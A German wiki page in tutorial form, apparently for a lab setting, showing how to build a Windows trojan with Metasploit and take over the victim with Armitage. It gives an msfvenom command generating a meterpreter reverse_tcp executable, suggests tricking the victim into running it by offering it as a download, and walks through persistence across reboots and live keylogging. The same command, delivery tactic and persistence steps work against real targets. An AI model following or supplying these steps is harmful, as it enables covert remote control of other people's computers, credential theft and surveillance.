Metasploit & armitage trojaner

Aus xinux.net
Zur Navigation springen Zur Suche springen

setup Hacker 

Kali linux
ip:  192.168.242.91

setup Opfer 

Windows 7 domaine rechner
Benutzer: Admin
ip:  192.168.242.76

Trojaner erstellen

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe

7 trojaner.png

dem opfer das programm unterschieben

das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an

8 opfer.png

auf der opfer seite

12 schadeware.png

kontrolle übernehmen

nun starten wier erst meta sploit und danach arimtage

1armitagestarten.png

wenn armitage gestarte ist erstellne wier einen server zum luaschen

  • payload
    • windows
      • metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer computer

Dauerhaft infizieren

als nächstes wollen wier den trojaner dauerhaft speichern

wir suchen nach persists und geben einen neuen port an

200persist.png

wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden

diese kann ein par minuten dauern

Was kann man machen

jetzt gibt es viele möglichkeiten

  • rechtsklick infizierter pc
    • meterpreter
      • explore

hier können wir uns Prozesse oder dateien anzeigen lassen andere Prozesse infizieren oder einen keyloger installieren usw

kurz Beispiel key loger

auf dem rechten seite schauen wier live in die datei in der wir mitschneiden

auf der linken seite ist der infizierte windows rechner

400 keyloger.png

Abgerufen von „https://xinux.net/index.php?title=Metasploit_%26_armitage_trojaner&oldid=10077